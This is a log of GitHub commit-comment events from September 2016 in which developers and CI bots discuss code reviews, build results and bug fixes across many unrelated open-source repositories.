{"id":"4589879416","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19096696,"position":57,"line":57,"path":"template/package.tpl","commit_id":"35f8c9b2abdee4c09b75927df0979d53f5f15737","created_at":"2016-09-20T14:07:14Z","updated_at":"2016-09-20T14:07:14Z","body":"`inProgress` would be more readable."}},"created_at":"2016-09-20T14:07:14Z"}
{"id":"4589879495","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"kripken/emscripten"},"payload":{"comment":{"id":19096697,"position":null,"line":null,"path":null,"commit_id":"3a1ac39bf627da8712a222d251237b41dfb8038f","created_at":"2016-09-20T14:07:15Z","updated_at":"2016-09-20T14:07:15Z","body":"Oh sorry, had missed this question. Good one to point out, this wasn't obvious.\r\n\r\nThe reason for this is the regex search-replace mess in `USE_PTHREADS=2` mode, which search-replaces all the atomics ops to non-atomic ones if SAB is not supported. The patching only looks for HEAP32, but not HEAPU32. The exact line in question is this one: https://github.com/kripken/emscripten/commit/3a1ac39bf627da8712a222d251237b41dfb8038f#diff-94dc100be52b26c684387d19d991a887R505, which would not get patched.\r\n\r\nBecause there are so many regexes that are run and it has been commented that the regex patching is already somewhat slow, I did not want to complicate things and make the regex search-replace look for both HEAP32 and HEAPU32. Fastcomp JSBackend only generates code with the HEAP32 version, never with HEAPU32, so the regex patching only looks for HEAP32.\r\n\r\nAll the remaining changes in this commit are for consistency, I wanted the loads and stores to all be to the same type to be systematic."}},"created_at":"2016-09-20T14:07:15Z"}
{"id":"4589881683","type":"CommitCommentEvent","actor":{"login":"cluther"},"repo":{"name":"zenoss/ZenPacks.zenoss.PythonCollector"},"payload":{"comment":{"id":19096704,"position":null,"line":null,"path":null,"commit_id":"eb1c5caef00ab0f6999c6153d35f262074485a5b","created_at":"2016-09-20T14:07:36Z","updated_at":"2016-09-20T14:07:36Z","body":"@dougsyer: You're right about that."}},"created_at":"2016-09-20T14:07:36Z"}
{"id":"4589886950","type":"CommitCommentEvent","actor":{"login":"damian-rodriguez-sociomantic"},"repo":{"name":"damian-rodriguez-sociomantic/flounder"},"payload":{"comment":{"id":19096712,"position":15,"line":25,"path":"src/core/flounder.js","commit_id":"7365bdb1f827e80791e3d2ece5e92d842b14fdef","created_at":"2016-09-20T14:08:26Z","updated_at":"2016-09-20T14:08:26Z","body":"@tar-viturawong-sociomantic @huei-tan-sociomantic this is fixed [here](https://github.com/damian-rodriguez-sociomantic/flounder/issues/2) .\r\n\r\nNow you can add custom text for `noMoreOptionsEl` and `noResultsEl` as a flounder options"}},"created_at":"2016-09-20T14:08:26Z"}
{"id":"4589890223","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096716,"position":null,"line":null,"path":null,"commit_id":"95e0734be45527a370a645a00596b67aa1433429","created_at":"2016-09-20T14:08:56Z","updated_at":"2016-09-20T14:08:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1068](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13633&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 01:14:55"}},"created_at":"2016-09-20T14:08:56Z"}
{"id":"4589892598","type":"CommitCommentEvent","actor":{"login":"davezuko"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19096722,"position":7,"line":7,"path":"src/store/reducers.js","commit_id":"4ecc655ae7c5db83e6c3edffd7456a667191bf2e","created_at":"2016-09-20T14:09:18Z","updated_at":"2016-09-20T14:09:18Z","body":"Ah, very good points, thanks for catching that root reducer issue; the location change subscription/action is also an awesome addition, so 👍 for that. I have a doctor's appointment this afternoon, but will get on a PR for these after. Thanks as always for saving me from myself."}},"created_at":"2016-09-20T14:09:18Z"}
{"id":"4589899465","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096740,"position":27,"line":1263,"path":"src/common/config/session-config.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:10:24Z","updated_at":"2016-09-20T14:10:24Z","body":"Simply to be explicit about our intention. No use otherwise. Those could be removed."}},"created_at":"2016-09-20T14:10:24Z"}
{"id":"4589899476","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"kripken/emscripten"},"payload":{"comment":{"id":19096739,"position":7,"line":946,"path":"src/preamble.js","commit_id":"1a290e9055a107a7b284fc60b0e63cc54993123b","created_at":"2016-09-20T14:10:24Z","updated_at":"2016-09-20T14:10:24Z","body":"I think this question was covered earlier, for posterity if stumbling on this in history: the inits are now in https://github.com/kripken/emscripten/blob/incoming/src/preamble.js#L953, where they need to be conditional since pthread-main.js has preinitialized the variables for threads."}},"created_at":"2016-09-20T14:10:24Z"}
{"id":"4589901545","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19096745,"position":null,"line":null,"path":null,"commit_id":"983942da3ea5c9bdffc517f48f6435ca1e4aa150","created_at":"2016-09-20T14:10:44Z","updated_at":"2016-09-20T14:10:44Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35706/testReport/) for this commit**"}},"created_at":"2016-09-20T14:10:44Z"}
{"id":"4589902995","type":"CommitCommentEvent","actor":{"login":"sipayRT"},"repo":{"name":"gemini-testing/gemini"},"payload":{"comment":{"id":19096749,"position":null,"line":null,"path":null,"commit_id":"3eae59032adefcacb23a45a38222a33517ba54e4","created_at":"2016-09-20T14:10:58Z","updated_at":"2016-09-20T14:10:58Z","body":"ок, я в следующий раз позову тебя на ревью чейнджлога - будем учиться писать полезный текст"}},"created_at":"2016-09-20T14:10:58Z"}
{"id":"4589903940","type":"CommitCommentEvent","actor":{"login":"craig8"},"repo":{"name":"kmonson/volttron"},"payload":{"comment":{"id":19096752,"position":6,"line":7,"path":"examples/configurations/drivers/modbus1.config","commit_id":"cf0a5007f8758c0a0ff1a30e6bfbc620aa3e9b96","created_at":"2016-09-20T14:11:07Z","updated_at":"2016-09-20T14:11:07Z","body":"Why the change to your workspace?"}},"created_at":"2016-09-20T14:11:07Z"}
{"id":"4589905605","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19096756,"position":24,"line":42,"path":"core/src/main/java/esiptestbed/mudrod/recommendation/structure/CodeSimCalculator.java","commit_id":"fd6eac6962c4947fe2f62af5f97ecfc7a3d11549","created_at":"2016-09-20T14:11:22Z","updated_at":"2016-09-20T14:11:22Z","body":"@lewismc Since the code works fine without this line, I am curious about the benefit of this line? "}},"created_at":"2016-09-20T14:11:22Z"}
{"id":"4589907693","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":19096762,"position":null,"line":null,"path":null,"commit_id":"99228952e16d2f3836a5484d8211cf14049e0484","created_at":"2016-09-20T14:11:42Z","updated_at":"2016-09-20T14:11:42Z","body":"This just feels much better. There is no need anymore to expose AI guts to game module itself or make lots of wrappers for the same reason."}},"created_at":"2016-09-20T14:11:42Z"}
{"id":"4589911918","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096770,"position":31,"line":86,"path":"doc/man/lttng-load.1.txt","commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:12:21Z","updated_at":"2016-09-20T14:12:21Z","body":"+1"}},"created_at":"2016-09-20T14:12:21Z"}
{"id":"4589914190","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19096780,"position":24,"line":42,"path":"core/src/main/java/esiptestbed/mudrod/recommendation/structure/CodeSimCalculator.java","commit_id":"fd6eac6962c4947fe2f62af5f97ecfc7a3d11549","created_at":"2016-09-20T14:12:43Z","updated_at":"2016-09-20T14:12:43Z","body":"@Yongyao please see http://stackoverflow.com/questions/285793/what-is-a-serialversionuid-and-why-should-i-use-it"}},"created_at":"2016-09-20T14:12:43Z"}
{"id":"4589915180","type":"CommitCommentEvent","actor":{"login":"11digitlabs"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19096785,"position":null,"line":null,"path":null,"commit_id":"553d4742d6929c48316a0f069e13697a85c178f0","created_at":"2016-09-20T14:12:52Z","updated_at":"2016-09-20T14:12:52Z","body":"`data.hashtags` and `data.mentions` should be the final ones. I'll do it later today or tomorrow. VERY good idea!"}},"created_at":"2016-09-20T14:12:52Z"}
{"id":"4589915542","type":"CommitCommentEvent","actor":{"login":"JIMENOFONSECA"},"repo":{"name":"architecture-building-systems/CEAforArcGIS"},"payload":{"comment":{"id":19096786,"position":4,"line":73,"path":"cea/resources/radiation.py","commit_id":"a0ef3e8f61ba268ef61fff8a3b4213c1931b9443","created_at":"2016-09-20T14:12:56Z","updated_at":"2016-09-20T14:12:56Z","body":"You are right! Will do first thing in the morning...\n\nBest, Jimeno\n\nOn 20 Sep 2016, at 20:20, Daren Thomas <notifications@github.com<mailto:notifications@github.com>> wrote:\n\n\nthis kind of temporary fix tends to stay in the code base forever - would it be possible to just use a branch (e.g. \"brussels-case-study\") and keep that up-to-date with master?\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/architecture-building-systems/CEAforArcGIS/commit/a0ef3e8f61ba268ef61fff8a3b4213c1931b9443#commitcomment-19095149>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIjrgiMBWhzfYC6_x-YrdYolRsv_XVoCks5qr894gaJpZM4KBje->.\n"}},"created_at":"2016-09-20T14:12:56Z"}
{"id":"4589916286","type":"CommitCommentEvent","actor":{"login":"tim-nordell-nimbelink"},"repo":{"name":"aws/aws-iot-device-sdk-embedded-C"},"payload":{"comment":{"id":19096787,"position":5,"line":71,"path":"include/network_interface.h","commit_id":"70071112bd5e1c5b9f150894fafe199637b4f63a","created_at":"2016-09-20T14:13:04Z","updated_at":"2016-09-20T14:13:04Z","body":"It should be the physical layer here, as well as iot_tls_is_connected(...).  See #36."}},"created_at":"2016-09-20T14:13:04Z"}
{"id":"4589920367","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096798,"position":27,"line":1263,"path":"src/common/config/session-config.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:13:40Z","updated_at":"2016-09-20T14:13:40Z","body":"A comment would be better then."}},"created_at":"2016-09-20T14:13:40Z"}
{"id":"4589920531","type":"CommitCommentEvent","actor":{"login":"Yc-Chen"},"repo":{"name":"kevinchappell/formBuilder"},"payload":{"comment":{"id":19096800,"position":null,"line":null,"path":null,"commit_id":"813aff604761c1f20b451592190d8c9552254387","created_at":"2016-09-20T14:13:42Z","updated_at":"2016-09-20T14:13:42Z","body":"Great!!"}},"created_at":"2016-09-20T14:13:42Z"}
{"id":"4589922596","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19096809,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T14:14:00Z","updated_at":"2016-09-20T14:14:00Z","body":"Are jd_to_gregorian2 and gregorian_to_jd2 (Gregorian only, Wikipedia-based) functions is total reversible"}},"created_at":"2016-09-20T14:14:00Z"}
{"id":"4589924593","type":"CommitCommentEvent","actor":{"login":"GreatTry"},"repo":{"name":"GreatTry/ghrey"},"payload":{"comment":{"id":19096813,"position":31,"line":31,"path":"index.html","commit_id":"b9fb8718c82960ef1a8af4c1973c4181e4b14542","created_at":"2016-09-20T14:14:16Z","updated_at":"2016-09-20T14:14:16Z","body":"test _text_"}},"created_at":"2016-09-20T14:14:16Z"}
{"id":"4589925200","type":"CommitCommentEvent","actor":{"login":"skeswa"},"repo":{"name":"skeswa/gophr"},"payload":{"comment":{"id":19096815,"position":112,"line":278,"path":"router/version_and_archive_package_test.go","commit_id":"f5fd18b46cbf85b0c646fd5b278e831cafa9d545","created_at":"2016-09-20T14:14:22Z","updated_at":"2016-09-20T14:14:22Z","body":"You probably want to assert that this function gets called at all."}},"created_at":"2016-09-20T14:14:22Z"}
{"id":"4589926489","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19096820,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T14:14:33Z","updated_at":"2016-09-20T14:14:33Z","body":"I think @@koquantam has done update SELinux.\n\n2016-09-20 20:57 GMT+07:00 Muhammad Ihsan <notifications@github.com>:\n\n> @ngoquang2708 <https://github.com/ngoquang2708>\n>\n> This commit on SELinux folder its enough or need more?\n> https://github.com/koquantam/android_kernel_samsung_\n> grandprimeve3g-CORE/commits/cm-13.0?after=Mjc5\n>\n> #I am sorry for bad english :D\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-19096546>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9sxov6vB1VINQMnBnNmF36Aw4MvQks5qr-YygaJpZM4J4Cgx>\n> .\n>\n"}},"created_at":"2016-09-20T14:14:33Z"}
{"id":"4589930123","type":"CommitCommentEvent","actor":{"login":"skeswa"},"repo":{"name":"skeswa/gophr"},"payload":{"comment":{"id":19096825,"position":158,"line":324,"path":"router/version_and_archive_package_test.go","commit_id":"f5fd18b46cbf85b0c646fd5b278e831cafa9d545","created_at":"2016-09-20T14:15:06Z","updated_at":"2016-09-20T14:15:06Z","body":"Make sure that you assert that this gets called."}},"created_at":"2016-09-20T14:15:06Z"}
{"id":"4589930188","type":"CommitCommentEvent","actor":{"login":"coderdiaz"},"repo":{"name":"nredbugs/app_emails"},"payload":{"comment":{"id":19096827,"position":18,"line":18,"path":"app/Http/Controllers/testController.php","commit_id":"d763d25f809f75b25f72a04aae8ad781d5ae4f61","created_at":"2016-09-20T14:15:07Z","updated_at":"2016-09-20T14:15:07Z","body":"Cuidado con esto, ya expusiste tus credenciales de acceso a tu cuenta de correo. Utiliza el .env para tus variables de entorno."}},"created_at":"2016-09-20T14:15:07Z"}
{"id":"4589931403","type":"CommitCommentEvent","actor":{"login":"chancesmith"},"repo":{"name":"DevCatalyst/socktober"},"payload":{"comment":{"id":19096830,"position":7,"line":6,"path":"share.html","commit_id":"fb488bf50313daa33e580a35ef6aeb26ff284f5d","created_at":"2016-09-20T14:15:17Z","updated_at":"2016-09-20T14:15:17Z","body":"Looks like there was a merge conflict. This is the joys of Git.\r\n\r\nNeed help with this @ccronin64?\r\nhttps://githowto.com/resolving_conflicts"}},"created_at":"2016-09-20T14:15:17Z"}
{"id":"4589932866","type":"CommitCommentEvent","actor":{"login":"X-Ryl669"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19096834,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T14:15:31Z","updated_at":"2016-09-20T14:15:31Z","body":"Actually, this patch includes 2 changes (sorry, it's a hobby project ;-)\r\nsystem_deep_sleep only works if called by the OS, and there is no other timer running on.\r\nSo the initial code simply \"appeared\" to work, but in reality the ESP rebooted after any watchdog triggered (software / hardware). If you observe the UART output of the ESP while it's running, you'll see it reboot after 6s or 30s depending if SW or HW watchdog is the reason for booting.\r\n\r\nThe other change in this patch is because I'm not getting reliable \"power sequence\" on the STM32 with the mosfet. When the ESP boots, the GPIO12 jiggles, and the STM32 starts to boot multiple time (I've seen this with a serial line connected on the STM32). The issue, is that the UART/SPI line jiggles as well, and sometime the STM32 receives a `cmd` that seems valid to it, and display a bullshit screen. That's not very clean.\r\nSo, instead, I connected the GPIO12 from ESP to the RST line on the STM32 with the idea that by default the ESP will control when the STM32 gets out of reset. The idea underneath is that power consumption in reset should be as low as with a power gating transistor, since a reset circuit is exactly what the transistor is supposed to be doing. \r\n\r\nIn the final version, the \"power_gate_screen\" is a no-op anyway, I'm not using it anymore, I'm only driving the RST line from the outside of the loop. "}},"created_at":"2016-09-20T14:15:31Z"}
{"id":"4589933710","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":19096837,"position":314,"line":314,"path":"source/game/ai/ai_ascript.cpp","commit_id":"99228952e16d2f3836a5484d8211cf14049e0484","created_at":"2016-09-20T14:15:38Z","updated_at":"2016-09-20T14:15:38Z","body":"I know that a similar thing exist in `ui/as/asbind.h`, but:\r\n1) Mine code is more compatible to the rest of game script handling.\r\n2) UI code relies heavily on std/STL containers which should not be met in game code."}},"created_at":"2016-09-20T14:15:38Z"}
{"id":"4589934984","type":"CommitCommentEvent","actor":{"login":"ali1234"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":19096841,"position":null,"line":null,"path":null,"commit_id":"dedd75f08ffe3360722ab761da18987aa681edd1","created_at":"2016-09-20T14:15:48Z","updated_at":"2016-09-20T14:15:48Z","body":"At the very top of the file there is still a link to the (now dead) redmine tracker."}},"created_at":"2016-09-20T14:15:48Z"}
{"id":"4589938672","type":"CommitCommentEvent","actor":{"login":"MadWombat"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19096858,"position":null,"line":null,"path":null,"commit_id":"9f85246631d9ffc3d76ae881442c993a5f6e91b6","created_at":"2016-09-20T14:16:23Z","updated_at":"2016-09-20T14:16:23Z","body":"This makes no sense. You cast y to float32 and immediately overwrite it."}},"created_at":"2016-09-20T14:16:23Z"}
{"id":"4589948638","type":"CommitCommentEvent","actor":{"login":"anglofox"},"repo":{"name":"anglofox/docs"},"payload":{"comment":{"id":19096890,"position":null,"line":null,"path":null,"commit_id":"bd1074a75da4c6faa2451c9be02d0015f9fad392","created_at":"2016-09-20T14:17:56Z","updated_at":"2016-09-20T14:17:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wwzVYsA0&#x2F;570-bug-warning-remote-port-forwarding-failed-for-listen-port-11080\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug: Warning: remote port forwarding failed for listen port 11080</a>"}},"created_at":"2016-09-20T14:17:56Z"}
{"id":"4589950203","type":"CommitCommentEvent","actor":{"login":"artoj"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":19096893,"position":null,"line":null,"path":null,"commit_id":"826f3a4bc121b761905ceec7df6a5d0b0ac57aa4","created_at":"2016-09-20T14:18:08Z","updated_at":"2016-09-20T14:18:08Z","body":"Just a couple of weeks ago there was a QtCon presentation about American Fuzzy Lop and Address Sanitizer by Hanno Böck. Here's the page with links to the slides and video: https://conf.qtcon.org/en/qtcon/public/events/467\r\n\r\nI've used both tools previously in non-Qt projects."}},"created_at":"2016-09-20T14:18:08Z"}
{"id":"4589963191","type":"CommitCommentEvent","actor":{"login":"ih24n69"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19096935,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T14:20:04Z","updated_at":"2016-09-20T14:20:04Z","body":"Ok will try compile the kernel. Thank you very much for your answer bro :) ."}},"created_at":"2016-09-20T14:20:04Z"}
{"id":"4589963889","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19096939,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T14:20:11Z","updated_at":"2016-09-20T14:20:11Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1766 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T14:20:11Z"}
{"id":"4589964593","type":"CommitCommentEvent","actor":{"login":"Sherbanm"},"repo":{"name":"rdiekema/Cities-Skylines-Mapper"},"payload":{"comment":{"id":19096940,"position":null,"line":null,"path":null,"commit_id":"4351ee0dfb6b45433b62e6baa4a6a10be5d5f252","created_at":"2016-09-20T14:20:16Z","updated_at":"2016-09-20T14:20:16Z","body":"Whats the reason behind removing the export functionality?"}},"created_at":"2016-09-20T14:20:16Z"}
{"id":"4589965802","type":"CommitCommentEvent","actor":{"login":"williampeer"},"repo":{"name":"digipost/ios"},"payload":{"comment":{"id":19096943,"position":null,"line":null,"path":null,"commit_id":"49783e7d177b282a739008730f86adbdecbe7277","created_at":"2016-09-20T14:20:26Z","updated_at":"2016-09-20T14:20:26Z","body":"@ftlno Merge denne inn i Paginerings-branchen? Begrenset hva man får testet før det f.eks. swizzles."}},"created_at":"2016-09-20T14:20:26Z"}
{"id":"4589967977","type":"CommitCommentEvent","actor":{"login":"thecristen"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19096953,"position":null,"line":null,"path":null,"commit_id":"ff21c5e6b5edefab0741c0e4ee439012943adb72","created_at":"2016-09-20T14:20:46Z","updated_at":"2016-09-20T14:20:46Z","body":"I need some more information... do you see the link on the patient dashboard for a measure that has multiple populations? Does `patient_dashboard/layout.hbs` look as expected?"}},"created_at":"2016-09-20T14:20:46Z"}
{"id":"4589971803","type":"CommitCommentEvent","actor":{"login":"Mak-Di"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19096959,"position":14,"line":124,"path":"docs/guide-es/db-dao.md","commit_id":"51e3e4c28acd3b355fb80f6d38ddaa59c5d8ccfb","created_at":"2016-09-20T14:21:20Z","updated_at":"2016-09-20T14:21:20Z","body":"php comment"}},"created_at":"2016-09-20T14:21:20Z"}
{"id":"4589973121","type":"CommitCommentEvent","actor":{"login":"Mak-Di"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19096963,"position":5,"line":114,"path":"docs/guide-es/db-dao.md","commit_id":"51e3e4c28acd3b355fb80f6d38ddaa59c5d8ccfb","created_at":"2016-09-20T14:21:32Z","updated_at":"2016-09-20T14:21:32Z","body":"php comment"}},"created_at":"2016-09-20T14:21:32Z"}
{"id":"4589974358","type":"CommitCommentEvent","actor":{"login":"Mak-Di"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19096966,"position":5,"line":185,"path":"docs/guide-es/caching-data.md","commit_id":"51e3e4c28acd3b355fb80f6d38ddaa59c5d8ccfb","created_at":"2016-09-20T14:21:43Z","updated_at":"2016-09-20T14:21:43Z","body":"php comment"}},"created_at":"2016-09-20T14:21:43Z"}
{"id":"4589974905","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19096969,"position":null,"line":null,"path":null,"commit_id":"b29fdddfd650759787d1529e684a37f61401f8b1","created_at":"2016-09-20T14:21:49Z","updated_at":"2016-09-20T14:21:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#D6A1dZ0vSqqfF01X_OOedA"}},"created_at":"2016-09-20T14:21:49Z"}
{"id":"4589975950","type":"CommitCommentEvent","actor":{"login":"ruoxichen5"},"repo":{"name":"hakyimlab/PrediXcan"},"payload":{"comment":{"id":19096971,"position":null,"line":null,"path":null,"commit_id":"bd8f1e341c3a95072009c1733049b1d12304feed","created_at":"2016-09-20T14:21:59Z","updated_at":"2016-09-20T14:21:59Z","body":"I compared the predixCan result with the observed gene expression data from whole blood. The correlation was very low. I am just wondering where did I do wrong. I also found the predicted_expression.txt file generated expression profile for 11540 genes, but 10770 of them showed zero expression value. So the model I used was DGN-WB-unscaled_0.5.db. There was no error reported when I was running PredixCan. Do you have any suggestion about improve my gene prediction work? Really appreciate."}},"created_at":"2016-09-20T14:21:59Z"}
{"id":"4589977286","type":"CommitCommentEvent","actor":{"login":"nicholascloud"},"repo":{"name":"adamlucz90/RecordmateAngular"},"payload":{"comment":{"id":19096976,"position":23,"line":16,"path":"api/controllers/collection.js","commit_id":"08c77236bd46beedb46073e0cbd7a81ff5e7bdf7","created_at":"2016-09-20T14:22:11Z","updated_at":"2016-09-20T14:22:11Z","body":"Since this is a fatal error, return after sending `res.status(401)...` so the rest of the function does not continue executing. Also, HTTP 401 errors are \"unauthorized\" errors; what we probably want here is HTTP 500, which is \"server error\". Here is a good list of all the HTTP status codes with the most common ones highlighted with stars: http://www.restapitutorial.com/httpstatuscodes.html"}},"created_at":"2016-09-20T14:22:11Z"}
{"id":"4589979000","type":"CommitCommentEvent","actor":{"login":"Mak-Di"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19096979,"position":14,"line":226,"path":"docs/guide-es/input-validation.md","commit_id":"51e3e4c28acd3b355fb80f6d38ddaa59c5d8ccfb","created_at":"2016-09-20T14:22:26Z","updated_at":"2016-09-20T14:22:26Z","body":"php comment"}},"created_at":"2016-09-20T14:22:26Z"}
{"id":"4589979755","type":"CommitCommentEvent","actor":{"login":"ibab"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19096982,"position":null,"line":null,"path":null,"commit_id":"9f85246631d9ffc3d76ae881442c993a5f6e91b6","created_at":"2016-09-20T14:22:33Z","updated_at":"2016-09-20T14:22:33Z","body":"Ouch, this should have been `y = 2 * (y / mu) - 1`"}},"created_at":"2016-09-20T14:22:33Z"}
{"id":"4589982857","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19096992,"position":null,"line":null,"path":null,"commit_id":"3c6c70758bc05d29229b1afdc2fcc09116e6e97a","created_at":"2016-09-20T14:23:01Z","updated_at":"2016-09-20T14:23:01Z","body":"TaskCluster: @meetmangukiya does not have permission to trigger tasks."}},"created_at":"2016-09-20T14:23:01Z"}
{"id":"4589983735","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19096994,"position":null,"line":null,"path":null,"commit_id":"9650cd797a9b2f1722cfe34ce562e0f99cb27aa7","created_at":"2016-09-20T14:23:10Z","updated_at":"2016-09-20T14:23:10Z","body":"Initial commit."}},"created_at":"2016-09-20T14:23:10Z"}
{"id":"4589985726","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19097000,"position":5,"line":185,"path":"docs/guide-es/caching-data.md","commit_id":"51e3e4c28acd3b355fb80f6d38ddaa59c5d8ccfb","created_at":"2016-09-20T14:23:25Z","updated_at":"2016-09-20T14:23:25Z","body":"Let it be"}},"created_at":"2016-09-20T14:23:25Z"}
{"id":"4589988493","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19097012,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T14:23:50Z","updated_at":"2016-09-20T14:23:50Z","body":"> On **-4529** year, the algorithm breaks again\r\n\r\nYour tests just proove that the algorithm is very unstable :worried: There are many false assumptions in its model.\r\n\r\n> May be left as it is?\r\n\r\nNo. We must find another way. Because \"we make an universal tool for unified coding and conversion of dates\" :smiley:"}},"created_at":"2016-09-20T14:23:50Z"}
{"id":"4589994943","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19097038,"position":null,"line":null,"path":null,"commit_id":"162ab6152dec59e035f23d31ae86625b4fbb720b","created_at":"2016-09-20T14:24:47Z","updated_at":"2016-09-20T14:24:47Z","body":"TaskCluster: @meetmangukiya does not have permission to trigger tasks."}},"created_at":"2016-09-20T14:24:47Z"}
{"id":"4589999787","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19097055,"position":null,"line":null,"path":null,"commit_id":"7fe91cc256e6476f192db299bce14df8cf0cc0a2","created_at":"2016-09-20T14:25:30Z","updated_at":"2016-09-20T14:25:30Z","body":"Initial commit."}},"created_at":"2016-09-20T14:25:30Z"}
{"id":"4590002739","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"nzakas/understandinges6"},"payload":{"comment":{"id":19097062,"position":null,"line":null,"path":null,"commit_id":"748b04dc0c5aa344b643574df733b6b0e308ba64","created_at":"2016-09-20T14:25:57Z","updated_at":"2016-09-20T14:25:57Z","body":"👍"}},"created_at":"2016-09-20T14:25:57Z"}
